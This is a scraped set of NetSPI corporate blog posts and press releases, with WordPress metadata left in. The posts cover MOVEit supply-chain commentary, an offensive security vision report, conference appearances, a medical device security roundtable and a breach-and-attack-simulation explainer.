This is a blind spot that DevSecOps does not cover. Let’s assume that you have the best DevSecOps workflows and pipelines that money can establish. Your team raves about their developer journey. They can work from their integrated development environment (IDE). They write test cases for all functionalities. They perform deep Static Application Security Testing (SAST) using GrammaTech CodeSonar. Their merge requests are automatically rejected unless all tests pass.
The blind spot is typically that nobody sits down and thinks “how can I break this stack of technology” from the adversarial perspective. And this is exactly where the partnership between GrammaTech and NetSPI comes in.
NetSPI provides an adversarial view and enhances the capabilities of teams with a ‘what if’ perspective. NetSPI reviews designs with the experience of what can go wrong as part of a Secure Code Review service. This looks at design and code in a way that automated tools cannot. Security experts review your team's usage of SAST and their assessments and see what is overlooked. On top of that, the security experts at NetSPI can also help your team in triaging SAST warnings, so they do not have to. This is useful if you are adding larger bodies of code to existing projects for example.
Lastly, and this may be the most important of all, NetSPI can help your team become better with secure coding and remediation training. Based on what NetSPI’s team of offensive security specialists sees, they can use your code to provide recommendations on how to improve the capabilities of a team.
What you end up with in the end is a stronger product, and a stronger, more experienced team. Partnerships like this result in shared strength across teams. Explore GrammaTech or NetSPI’s Partnership options for more.
NetSPI EMEA Senior Security Consultant Tyler Sullivan shares supply chain security insights surrounding the MOVEit CVE with CyberWire Pro. Read a snippet below, or find the full article at https://thecyberwire.com/newsletters/privacy-briefing/5/115.
+++
Speaking of the MOVEit bug, US research institution and medical center the Johns Hopkins University has disclosed it suffered a cyberattack connected to the vulnerability. A notification letter sent to the university community states that the incident "may have impacted the information of Johns Hopkins employees, students and/or patients." Officials say an investigation is ongoing, and that it does not appear that electronic health records were impacted. Cybersecurity expert Bill Sieglein told WBAL 11 News, "This was called a 'zero-day attack,' meaning the attackers, who are out of Russia, a group known as CLOP, they discovered a vulnerability in this piece of software called MOVEit. MOVEit is a piece of software that allows you to move large data files between networks and between systems. They found a vulnerability before anybody knew about it and, all at once, launched an attack worldwide.”
Tyler Sullivan, Senior Security Consultant at NetSPI, commented on the implications of this instance of MOVEit exploitation for software supply chain security. “Following the recently disclosed, widely exploited vulnerability in the MOVEit file transfer product, multiple organizations have disclosed they’ve been affected despite not being first-hand users of the technology -- due to the complex software supply chain ecosystem," Sullivan wrote. "To slow third-party software vendor-based attacks, a paradigm shift is required, from standard perimeter-based networks to a Zero Trust architecture. Additionally, it’s critical for organizations to minimize the attack surface and reliance on the supply chain - this means decreasing the amount of third parties used and regularly auditing them for any security gaps. There is not a single responsible party for the supply chain, it's down to the vendors, the repositories, the software consumers and the developers. The second half of 2023 should be when we see meaningful progress by all parties involved to control the supply chain and ensure it can be used in a secure way.”
While the Russian hackers were the first to exploit the vulnerability, experts warn that other groups might now possess the necessary software code to conduct similar attacks. The CLOP group had initially set a deadline for victims to contact them regarding ransom payments. Afterward, they began listing additional alleged victims on their dark web extortion site. However, as of the latest update, no US federal agencies were listed. The hackers even reassured government entities by stating that they had erased all their data and had no intention of exposing such information.
The CLOP ransomware group is part of a larger collection of gangs primarily based in Eastern Europe and Russia, notorious for their focus on extracting significant sums of money from their victims.
This latest cyberattack highlights the extensive impact that a single software vulnerability can have when exploited by skilled criminals. The hackers, a well-known group that emerged in 2019, began exploiting a new flaw in MOVEit, a widely used file-transfer software, in late May. Their approach appeared opportunistic, targeting as many vulnerable organizations as possible and leaving them susceptible to extortion.
Progress, the US company that owns MOVEit software, has advised victims to update their software packages and has issued security recommendations to mitigate the risks.
Tyler Sullivan, Senior Security Consultant, NetSPI provided insights on how a shift in security strategy implementation could help thwart this type of threat in the future:
"To slow third-party software vendor-based attacks, a paradigm shift is required, from standard perimeter-based networks to a Zero Trust architecture. Additionally, it’s critical for organizations to minimize the attack surface and reliance on the supply chain - this means decreasing the amount of third parties used and regularly auditing them for any security gaps.
There is not a single responsible party for the supply chain, it's down to the vendors, the repositories, the software consumers and the developers. The second half of 2023 should be when we see meaningful progress by all parties involved to control the supply chain and ensure it can be used in a secure way.”
Following record growth and international expansion, offensive security leader to present attack surface insights at Europe’s largest security event.
Minneapolis, MN and London – 20 June, 2023 – NetSPI, the global leader in offensive security, will be exhibiting and speaking at Infosecurity Europe 2023, Europe’s largest cybersecurity event taking place from 20-22 June at ExCeL London. NetSPI is located at stand #T55 on the show floor.
Following a year of record growth and international expansion across Europe, Middle East, and Africa (EMEA), NetSPI will be on-site to demo its comprehensive suite of continuous and scalable offensive security solutions, which include Penetration Testing as a Service, Attack Surface Management, and Breach and Attack Simulation. NetSPI’s customer-centric focus, combined with its offensive security expertise, enables the company to meet increasing international demand for its offering in the region.
Additionally, on 20 June, from 3:45-4:15 PM BST, Sam Kirkman, EMEA Services Director at NetSPI, will present at the Talking Tactics Theatre in a session titled: “Testing the Untested.” In this talk, Sam will discuss how security leaders can make a meaningful difference in their security programs by understanding some of the less-tested areas of the attack surface, how to better gain risk visibility, and the most effective security controls based on insight from trained hackers.
To participate in a live demo, or to book a 1:1 meeting with an expert, please click here. To learn more about how NetSPI’s offensive security can help your organisation, please visit www.netspi.com.
Infosecurity Europe attendees can also join NetSPI, alongside Semperis, on 20 June from 5-8 PM BST at the Fox Connaught, on Lynx Way in London, for a complimentary happy hour. Please register for the event here.
About NetSPI
NetSPI is the global leader in offensive security, delivering the most comprehensive suite of penetration testing, attack surface management, and breach and attack simulation solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organisations discover, prioritise, and remediate security vulnerabilities. Its global cybersecurity experts are committed to securing the world’s most prominent organisations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with offices across the U.S., Canada, the UK, and India.
[post_title] => NetSPI at Infosecurity Europe 2023
[post_excerpt] => Learn where to find NetSPI at Infosecurity Europe 2023 in London. Schedule a meeting and meet the team at stand #T55!
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => infosecurity-europe-2023
[to_ping] =>
[pinged] =>
[post_modified] => 2023-06-13 08:49:41
[post_modified_gmt] => 2023-06-13 13:49:41
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=30330
[menu_order] => 42
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[26] => WP_Post Object
(
[ID] => 30383
[post_author] => 91
[post_date] => 2023-06-12 09:00:00
[post_date_gmt] => 2023-06-12 14:00:00
[post_content] =>
NetSPI Head of Product Cody Chamberlain joins Techstrong.tv's Mitch Ashley for a conversation on the 2023 Offensive Security Vision Report. Listen to the full interview.
+++
Cody Chamberlain, NetSPI head of product, shares highlights from NetSPI’s recently released 2023 Offensive Security Vision Report based on over 300,000 anonymized findings from more than 240,000 hours of penetration testing. The report identifies the 30 most prevalent vulnerabilities across various industries. Download the free report at netspi.com/resources/reports/offensive-security-vision-report-2023/
In its inaugural 2023 Offensive Security Vision Report, NetSPI unveils findings that highlight vulnerability trends across applications, cloud, and networks.
Vulnerability patterns
The report offers a look back — and forward — at some of the most significant vulnerability patterns of the past year to help security and business leaders focus discovery, management, and remediation efforts on the riskiest vulnerabilities most likely to exist on their attack surface.
According to the NIST National Vulnerability Database vulnerability count has steadily increased year-over-year for the past five years – and shows no signs of slowing down. This, coupled with the reality of burnt-out security and development teams, creates an imminent need for prioritization.
The report analyzed over 300,000 anonymized findings from thousands of pentest engagements, spanning more than 240,000 hours of testing, to identify the most prevalent vulnerabilities across various industries — which include healthcare, retail, finance, and manufacturing.
Today, offensive security is only as valuable as its ability to help you prioritize remediation of the issues that matter most to your business.
[post_title] => Help Net Security: Fresh perspectives needed to manage growing vulnerabilities
[post_excerpt] => NetSPI's 2023 Offensive Security Vision Report was featured in Help Net Security. Read the preview below or view the article online.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => helpnet-vision-report
[to_ping] =>
[pinged] =>
[post_modified] => 2023-05-31 16:20:54
[post_modified_gmt] => 2023-05-31 21:20:54
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=30277
[menu_order] => 45
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[28] => WP_Post Object
(
[ID] => 30175
[post_author] => 91
[post_date] => 2023-05-23 07:30:00
[post_date_gmt] => 2023-05-23 12:30:00
[post_content] =>
Survey finds lack of resources and prioritization as the greatest barriers to timely vulnerability remediation.
Minneapolis, Minnesota – NetSPI, the global leader in offensive security, today announced the findings from its inaugural 2023 Offensive Security Vision Report, focusing on vulnerability trends across applications, cloud, and networks. The report offers a look back — and forward — at some of the most significant vulnerability patterns of the past year to help security and business leaders focus discovery, management, and remediation efforts on the riskiest vulnerabilities most likely to exist on their attack surface.
The report analyzed over 300,000 anonymized findings from thousands of pentest engagements, spanning more than 240,000 hours of testing, to identify the most prevalent vulnerabilities across various industries — which include healthcare, retail, finance, and manufacturing.
Top findings include:
On average, the highest volume of critical and high severity vulnerabilities were discovered within the government and nonprofit industry. On the contrary, insurance had the lowest volume of critical and high severity vulnerabilities.
Internal networks have 3x more exploitable vulnerabilities than external networks.
Of the applications tested, web applications have a higher prevalence of high and critical vulnerabilities compared to mobile and thick applications.
The two greatest barriers to timely and effective remediation today are a lack of resources (70%) and prioritization (60%).
71% of respondents shared that less than one-fourth of security roles budgeted were entry-level, with 46% of those reporting no plans for entry-level hiring in 2023.
“One narrative made evident from our Offensive Security Vision Report is that vulnerability prioritization is critical,” said Vinay Anand, Chief Product Officer at NetSPI. “The reality is that we cannot fix every vulnerability discovered, but if prioritization and support continue to lack, the security industry will fall short. This realization, coupled with the industry experiencing rising burnout rates among developer teams, should evoke a sense of urgency. Our findings can help leaders grasp the severity of the situation to prioritize vulnerability management.”
“This report makes it abundantly clear that there’s still a lot to be done to support and enable the industry to improve vulnerability management,” said Cody Chamberlain, Head of Product at NetSPI. “We hope the observations and actionable recommendations throughout our inaugural Offensive Security Vision Report are a great data-driven starting point for security teams to harden their security.”
The 2023 Offensive Security Vision Report is available to download now. For more information about NetSPI, visit www.netspi.com.
About NetSPI
NetSPI is the global leader in offensive security, delivering the most comprehensive suite of penetration testing, attack surface management, and breach and attack simulation solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. Its global cybersecurity experts are committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India.
[post_title] => NetSPI Unveils 2023 Offensive Security Vision Report, Shines Light on the Need for Improved Vulnerability Prioritization
[post_excerpt] => In its inaugural Vision Report, NetSPI uncovers vulnerability trends across applications, cloud, and networks and shines a light on the need for improved vulnerability prioritization. Get the report now!
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => offensive-security-vision-report-2023
[to_ping] =>
[pinged] =>
[post_modified] => 2023-05-22 16:04:23
[post_modified_gmt] => 2023-05-22 21:04:23
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=30175
[menu_order] => 48
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[29] => WP_Post Object
(
[ID] => 30116
[post_author] => 91
[post_date] => 2023-05-08 09:00:00
[post_date_gmt] => 2023-05-08 14:00:00
[post_content] =>
MINNEAPOLIS — NetSPI, the offensive security leader, announced today that CRN®, a brand of The Channel Company, has named Lauren Gimmillaro, Vice President of Business Development & Strategic Alliances, to the 2023 Women of the Channel list. Every year, CRN recognizes women from vendor, distributor, and solution provider organizations whose expertise and vision are leaving a noticeable and commendable mark on the technology industry.
“We are ecstatic to announce this year’s honorees and shine a light on these women for their significant achievements, knowing that what they’ve accomplished has paved the way for continued success within the IT channel,” said Blaine Raddon, CEO of The Channel Company. “The channel is stronger because of them, and we look forward to seeing what they do next.”
Lauren Gimmillaro has a track record of launching four successful partner programs, working with channel, referral, reseller, and technology partners. In August 2022, Gimmillaro led the launch of NetSPI Partner Program, which empowers its global channel and technology partners to deliver offensive security services at a time when it’s needed most – a program that drove a 70 percent increase in YoY channel revenue. Gimmillaro now leads the NetSPI Partner Program to continue building strategic relationships between NetSPI and its partners.
“I’m honored to be recognized among this incredible list of female channel leaders. Partners play a vital role in NetSPI’s growth and expansion plans for the future,” said Gimmillaro. “It’s critical to provide end users with the tools, services, and skill sets they need to take an offensive approach to security. As we continue to grow our partner program, we’ll be looking at a variety of different partners, including MSP/MSSPs, VARs, vCISOs, to collectively help organizations across the globe improve security.”
The CRN 2023 Women of the Channel honorees bring their creativity, strategic thinking and leadership to bear in a variety of roles and responsibilities, but all are turning their unique talents toward driving success for their partners and customers. With this recognition, CRN honors these women for their unwavering dedication and commitment to furthering channel excellence.
The 2023 Women of the Channel list will be featured in the June issue of CRN Magazine, with online coverage starting May 8 at www.CRN.com/WOTC.
About NetSPI
NetSPI is the offensive security leader, delivering the most comprehensive suite of penetration testing, attack surface management, and breach and attack simulation solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India.
About The Channel Company
The Channel Company enables breakthrough IT channel performance with our dominant media, engaging events, expert consulting and education, and innovative marketing services and platforms. As the channel catalyst, we connect and empower technology suppliers, solution providers, and end-users. Backed by more than 30 years of unequaled channel experience, we draw from our deep knowledge to envision innovative solutions for ever-evolving challenges in the technology marketplace. www.thechannelcompany.com
[post_title] => CRN’s 2023 Women of the Channel Honors NetSPI’s Lauren Gimmillaro
[post_excerpt] => Lauren Gimmillaro, VP of Business Development & Strategic Alliances, has been recognized on CRN's 2023 Women of the Channel list. Read the announcement and learn about her work with the NetSPI Partner Program.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => lauren-gimmillaro-2023-women-of-the-channel-crn
[to_ping] =>
[pinged] =>
[post_modified] => 2023-05-08 08:48:08
[post_modified_gmt] => 2023-05-08 13:48:08
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=30116
[menu_order] => 50
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[30] => WP_Post Object
(
[ID] => 30087
[post_author] => 91
[post_date] => 2023-05-04 10:46:38
[post_date_gmt] => 2023-05-04 15:46:38
[post_content] =>
Security Weekly interviewed NetSPI Chief Product Officer live at RSAC 2023. The discussion centered around the evolution of the external attack surface management (EASM) market.
+++
Tune in for a conversation on:
Why EASM is a critical component of continuous threat exposure management (CTEM)
How to use EASM to improve validation and vulnerability management processes.
[post_title] => Security Weekly: The Evolution of External Attack Surface Management (EASM)
[post_excerpt] => Listen to our Security Weekly interview on the evolution of the external attack surface management (EASM) market - live from RSAC 2023.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => security-weekly-rsac-2023-easm
[to_ping] =>
[pinged] =>
[post_modified] => 2023-05-05 08:53:38
[post_modified_gmt] => 2023-05-05 13:53:38
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=30087
[menu_order] => 52
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[31] => WP_Post Object
(
[ID] => 30105
[post_author] => 91
[post_date] => 2023-05-03 14:29:02
[post_date_gmt] => 2023-05-03 19:29:02
[post_content] =>
In this video interview with Information Security Media Group at RSA Conference 2023, NetSPI Chief Product Officer Vinay Anand discusses:
The ever-expanding attack surface and its implications for offensive security;
NetSPI's mission to be the leader in offensive security by understanding a customers' exposure and adding a knowledge of business context to detect the risk level of each asset;
The crucial importance of rapid response to offensive security.
[post_title] => ISMG: Empowering a Powerhouse of Offensive Security Solutions
[post_excerpt] => Listen to our ISMG interview on NetSPI's mission to be the leader in offensive security - live from RSAC 2023.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => ismg-rsac-2023-offensive-security
[to_ping] =>
[pinged] =>
[post_modified] => 2023-08-18 14:35:22
[post_modified_gmt] => 2023-08-18 19:35:22
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=30105
[menu_order] => 53
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[32] => WP_Post Object
(
[ID] => 30042
[post_author] => 91
[post_date] => 2023-04-25 11:33:27
[post_date_gmt] => 2023-04-25 16:33:27
[post_content] =>
In cybersecurity, the discovery of assets and vulnerabilities is table stakes. What makes offensive security valuable today is its ability to prioritize remediation of issues that matter most to a business.
Modern security and development teams are inundated with challenges that demand their attention, leading to higher pressure in an already stressful role. What’s needed most is risk-based prioritization of vulnerabilities to help direct remediation efforts. NetSPI’s inaugural Offensive Security Vision Report delivers on this with data-backed prioritization of attack surfaces, vulnerabilities, and more.
We worked hard to uncover an anonymous, yet impactful way to share the trends we’ve seen during more than 240,000 hours of annual pentesting — and we can’t wait to share our insights with you!
Methodology
Our report is based on analysis of over 300,000 anonymized findings from thousands of 2022 pentest engagements. Here’s the approach we took:
We identified the top 30 most prevalent vulnerabilities from our six core focus areas or "attack surfaces" [web, mobile, and thick applications, cloud, and internal and external networks]. Additional criteria include:
Only medium, high, and critical severities were reported.
There were multiple instances of the finding across different company environments.
The findings were exploitable on multiple occasions.
Then we asked our in-house offensive security experts to manually identify 3-5 findings that security teams should prioritize based on likelihood and impact.
Lastly, we analyzed data for key trends across attack surface and industry.
The vulnerabilities within are based on likelihood and impact – we recommend any business with these attack surfaces to test for and remediate the security concerns highlighted in our Vision Report.
State of Remediation
We also surveyed several cybersecurity leaders from around the world to gauge the current state of remediation. A key narrative throughout our report, and made evident in our survey results, is that a lack of resources and prioritization are the two greatest barriers to timely and effective remediation. Yet, survey data showed security teams have limited plans for hiring in the coming year, especially when it comes to entry-level cybersecurity talent.
Even though security resources will remain tight, prioritization of efforts is one area security leaders can take action on to help alleviate priorities with parallel weight. Our report analyzed industries, attack surfaces, and vulnerabilities to distill the highest potential of risk for an organization to investigate and remediate.
Let’s start with industries.
Top 3 industries with the largest percentage of high & critical vulnerabilities:
Government & Non-profit
Healthcare
Education
Top 3 industries with the lowest percentage of high & critical vulnerabilities:
Energy & Utilities
Financial Services
Insurance
On average the highest volume of critical and high severity vulnerabilities was found within government and non-profit industries. On the other hand, insurance and financial services had the lowest volume of the same type of vulnerabilities. We found it interesting that two of the highest regulated industries landed at both ends of the spectrum with this data.
We also asked survey respondents to share their average SLAs, or remediation due dates for the four severities. In the report, you’ll find data from your peers that can help you revise or benchmark your SLAs.
Vulnerabilities to Prioritize
Our report analyzed six core areas: web, mobile, and thick applications, cloud, and internal and external networks. As detailed in the methodology, our expert offensive security team manually evaluated the top findings for each and identified the 3-5 vulnerabilities to prioritize discovery and remediation.
To view a complete list of all vulnerabilities we researched alongside detailed remediation tips from our team.
During the analysis, we also examined overarching trends across the attack surfaces. Two major findings include:
Web applications have a higher prevalence of high and critical vulnerabilities compared to mobile and thick applications.
We also analyzed entry points, or vulnerabilities that were deemed exploitable, finding that internal networks have nearly three times more exploitable vulnerabilities than external networks.
Dig into the Data for Yourself
Remember, offensive security is only as valuable as its ability to help prioritize remediation of the issues that matter most to your business. Arm yourself and your team with the insights necessary to add prioritization to your remediation efforts.
Our Vision Report covers:
Impactful vulnerabilities that are most pervasive across core application, cloud, and network attack surfaces
Which attack surface presents the least/most risk
Industries that hold the lowest/highest risk
Today’s requirements for remediation due dates
The greatest barriers to timely and effective remediation
NetSPI hosted three cybersecurity professionals in the medical device industry for a roundtable discussion on their top learnings from implementing medical device security programs. I had the pleasure of moderating the session and was joined by:
Matt Russo, Senior Security Director, Medtronic
Dr. Matt Weir, Principle Cyber Security Researcher, MITRE
Curt Blythe, Director of Product Security, Abbott
The conversation covered core factors a medical device security program must have, the departmental structure of a security team within a medical device company, how they each approach medical device pentesting and vulnerability management, and much more.
Security for medical devices is complex as it continually evolves alongside product innovation. The best programs bring security into the product development lifecycle from the start, with the flexibility for enhancements as new trends emerge.
3 Factors of Successful Medical Device Security Programs
Panelists agreed on these three factors to give medical device security programs the best chance of success:
Executive buy-in. This is easier said than done, but dedicating effort to educating the team that influences business decisions will pay off greatly over time.
Integration into quality assurance. When talking about baking security into the product development lifecycle, this is one tangible way to do so. The clinical process for medical devices is well-established. Steps for security must be intentional and agreed-upon to create consistent protocols in medical device design.
Internal and external partnerships. Security is a business enabler because it reduces the risk of adverse events that could affect an organization. The more security is embedded into the medical device process, the more empowered a team becomes to move faster in a safe manner.
On the external partnerships side, many industry organizations have collected input and developed research to help organizations embrace security in medical devices. Leaning on these associations and the educational content they publish is akin to a cheat sheet for medical device security.
This list isn’t exhaustive, but it’s a grounding step toward creating a strong strategy for medical device security.
“We need to share information effectively across the ecosystem to make sure we're all using as much knowledge as we can to continue to be in a spot to secure very critical assets.”
Matt Russo, Senior Security Director, Medtronic
Lean on External Partners for Medical Device Cybersecurity Education
Our panelists mentioned several industry organizations and common frameworks they’ve created to help share collective knowledge across the industry. These organizations are a good place to start when designing a medical device security program:
Bring leadership along in this education journey! Matt Russo recommends monitoring what’s happening in your industry at the legislative level and relaying it back to the company to let your team know what’s coming. This helps show value early on to help influence team buy-in.
Are you keeping tabs on the recently passed omnibus bill? According to a report from Health IT Security, within its 4,000 pages, you’ll find “language that would require medical device manufacturers to ensure that their devices meet select cybersecurity requirements.” Listen to the panelists discuss the package, and more on medical device security compliance, starting at 23:55.
How Security Teams are Structured within Medical Device Departments
The structure of a security team within an organization depends on the size of the company. As companies grow, the size of security teams does too, resulting in more specialized roles within the department. On the other hand, medical device manufacturers may have a single cybersecurity person on the team responsible for integrating security measures into the clinical process.
One commonality in both of these scenarios is that the security team is a centralized function that works with all individualized divisions. This avoids multiple people doing the same type of work and aids a consistent process organization-wide.
“When you can start actually trying to solve problems and get ahead of these issues, that's when you start being able to get that full buy-in to do more.”
Dr. Matt Weir, Principle Cyber Security Researcher, MITRE
If You Knew Then What You Know Now... What Would You Do Differently?
Experience is the best teacher. Panelists shared what they would do differently if they were starting over with a medical device security program.
Dr. Matt Weir: Understand that the clinical environment has a steep learning curve for people with traditional cybersecurity backgrounds.
Matt Russo: Push harder on internal education to equip non-technical leaders with the knowledge needed for buy-in. Move faster on best practices without needing legislation to drive the changes.
Curt Blythe: Build in a strategy from the start to update medical devices in the field as they transition from a single device to connected devices through IoT.
“As we're looking at the devices that are out in the field, how do we get updates to those? Is it a matter of sending a clinical engineer out there to update [it] holding a USB stick? Or can we do it over the air? Especially with the speed of security today, we need to be able to move faster. I think it becomes a speed and scale issue that we're going to have to work on.”
Curt Blythe, Director of Product Security, Abbott
Bookmark Now, Watch Later: Medical Device Security Webinar
Keep growing your knowledge in med device security by watching the roundtable discussion with Dr. Weir, Matt, and Curt. Their industry expertise and perspectives on trending topics such as the omnibus bill, updatability, and IoMT give anyone learning about med device security ideas on how to move their programs forward.
[post_title] => Keeping Up with Medical Device Cybersecurity
[post_excerpt] => NetSPI hosted medical device cybersecurity professionals from Medtronic, Abbott, and MITRE for a roundtable discussion on trends and best practices.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => keeping-up-with-medical-device-cybersecurity
[to_ping] =>
[pinged] =>
[post_modified] => 2023-04-12 08:18:52
[post_modified_gmt] => 2023-04-12 13:18:52
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29923
[menu_order] => 60
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[34] => WP_Post Object
(
[ID] => 29973
[post_author] => 91
[post_date] => 2023-04-09 06:26:00
[post_date_gmt] => 2023-04-09 11:26:00
[post_content] =>
NetSPI's acquisition of nVisium was featured in CRN's review of ten key cybersecurity acquisition deals in Q1 2023. Read a preview below or read the full article online here.
+ + +
The consolidation continued in the cybersecurity market during the first three months of the year, both among top vendors in the industry and major solution providers in the channel. We’ve collected details on 10 notable acquisition deals in cybersecurity that were announced or completed during the first quarter of 2023.
NetSPI Acquires nVisium
NetSPI, a provider of penetration testing services and attack surface management capabilities, said it’s expanding its capabilities for offensive security services with the acquisition in January of nVisium. The terms of the acquisition were not disclosed, and it was mainly aimed at adding talent for NetSPI’s penetration testing services, according to NetSPI CEO Aaron Shilts (pictured). The acquisition brings two “complementary offensive security teams together who are committed to delivering the highest standard of penetration testing on the market today,” Shilts said in a news release. The acquisition follows NetSPI’s $410 million funding round in October, aimed at uses including the expansion of its channel program.
NetSPI's medical device security roundtable was featured in Healthcare IT News in an article recapping the virtual event. Read the preview below or read it online here.
+ + +
Medical device innovations have enhanced healthcare and improved patient care, but they present a broad attack surface for healthcare organizations.
NetSPI, a security service company, hosted medical device product security experts to talk about the business and challenges of securing connected technologies in healthcare. They addressed sharing information across teams throughout the product lifecycle, building product security teams, legislative changes governing the space and strategies to increase the pipeline of talent.
Where does product security sit within the enterprise?
Matt Russo, senior director of product security at Medtronic, Curt Blythe, director of product security at Abbott and Matt Weir, principal cybersecurity engineer at MITRE, all agreed that, regardless of where product security teams sit, they need to be partners in product development.
Where it makes sense from a scale and efficiency perspective, there's one team dedicated to scanning devices as a centralized function with a distributed model, Blythe said.
But the key point is embedding design and security practices into what developers do every day, which ultimately enables them to move fast, "but in a safe way."
Russo said that at Medtronic, "You can really see that across the landscape."
While resource restrictions make centralized product security functions more feasible, and they generally work for Medtronic and other large organizations, he said many device companies need to look at the technical aptitude of security teams.
Is product security just a part of what they do?
Weir noted that it's hard to have a dedicated security team if you have a small product base.
"The big thing though is that you do have that integration during your product development lifecycle," he said.
When medical device developers try to add cybersecurity later into the process, it makes it much harder to be successful, he added. Weir advised integrating product security as early as possible into the product life cycle, and continuing communication as products evolve.
Product security specialists bring visibility into systems. They can then see how the devices are being used, and they are better positioned to recommend mitigations, he said.
[post_title] => Healthcare IT News: Tips on Medical Device Security from the Product Leaders' Perspective
[post_excerpt] => NetSPI's medical device security roundtable was featured in Healthcare IT News in an article recapping the virtual event.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => healthcare-it-news-medical-device-security
[to_ping] =>
[pinged] =>
[post_modified] => 2023-04-17 18:27:25
[post_modified_gmt] => 2023-04-17 23:27:25
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29970
[menu_order] => 62
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[36] => WP_Post Object
(
[ID] => 29878
[post_author] => 91
[post_date] => 2023-04-04 09:00:00
[post_date_gmt] => 2023-04-04 14:00:00
[post_content] =>
As the tools, technology, and processes to launch cyberattacks become increasingly sophisticated, organizations’ security controls must be more proactive than ever to get ahead of potential breaches by identifying vulnerabilities before they become an issue.
Unfortunately, few executives are confident in their company’s security effectiveness. Research from Accenture found that only 52 percent of security executives and 38 percent of non-security executives agree that their organization is well-protected from cyber threats.
To get ahead of the latest cybersecurity threats, forward-thinking organizations are turning to breach and attack simulation (BAS). In fact, research shows the breach and attack simulation market is projected to reach $1.12 billion by the end of 2022 and see a compound annual growth rate of 35.12% by 2032.
If protecting sensitive data and preventing access to critical systems is a goal for your organization, then learn more about BAS solutions, including its benefits, use cases and what to look for in a vendor to enhance security posture.
What is Breach and Attack Simulation?
Breach and attack simulation (BAS) is an advanced security testing method that involves playing the role of a sophisticated real-world threat actor to assess an organization’s security controls. BAS is defined by the larger market as automated security control validation that allows for continuous simulation, in most cases focused on validating detective control coverage. Market intelligence firm IDC defines key functions of BAS, including:
Attack: mimic real threats
Visualize: see exposures
Remediate: address gaps
In today’s evolving threat landscape, a single click can expose an organization’s global environment to an adversary. Breach and attack simulation plays a critical role in protecting organizations’ systems and infrastructure by simulating common attack methods throughout the cyber kill chain and offering expert counsel to prioritize remediation steps.
Advantages of Breach and Attack Simulation at Your Organization
According to NetSPI data, 80 percent of common attack behaviors are missed by out-of-the-box solutions for endpoint detection and response (EDR), security information and event management (SIEM), and managed security service provider (MSSP). This can leave organizations with a false sense of security.
While 100 percent detection doesn’t exist, breach and attack simulation can improve security controls to better detect a wide range of relevant attacks.
Key benefits of breach and attack simulation include:
Test your organization’s security controls and defend against emerging cyber threats and attacks. To stay ahead of malicious actors and threats, organizations must focus on detecting threats before an attack. An advanced BAS solution can continuously replicate real attack behavior, measure the effectiveness of security controls and identify gaps with customizable procedures. Because BAS mimics real-world threat actors, security teams can identify common adversary behaviors and — armed with this information — more effectively prioritize detection development as well as investments.
Meet the challenge of today’s cybersecurity skills gap. Reliance on technology has increased the need for workforces with technical expertise. The number of open positions in cybersecurity is increasing, while the demands put on employees are expanding, leading to fewer people taking on more responsibilities. Breach and Attack Simulation is a step in the right direction to combat today’s skills gap by directing the security team’s focus on the most impactful actions.
Help operational development and measure detective controls. BAS not only educates SOC teams on their environment and common attack behaviors, but it also helps enhance security programs by validating the efficacy of detective controls. NetSPI helps define KPIs upfront so security teams can track effectiveness over time. Data is consolidated into one centralized platform with the ability to configure and run customizable procedures.
Justify security spending and make the case for increased budget. A common goal for any security team is demonstrating the effectiveness of security spending to executive leadership and the board of directors. And cybersecurity is increasingly becoming a top strategic business priority across organizations, with Gartner predicting that 40 percent of boards of directors will have a dedicated cybersecurity committee by 2024. This has the potential for CISOs and security teams to receive more scrutiny, but also presents opportunities for increased security support and resources.
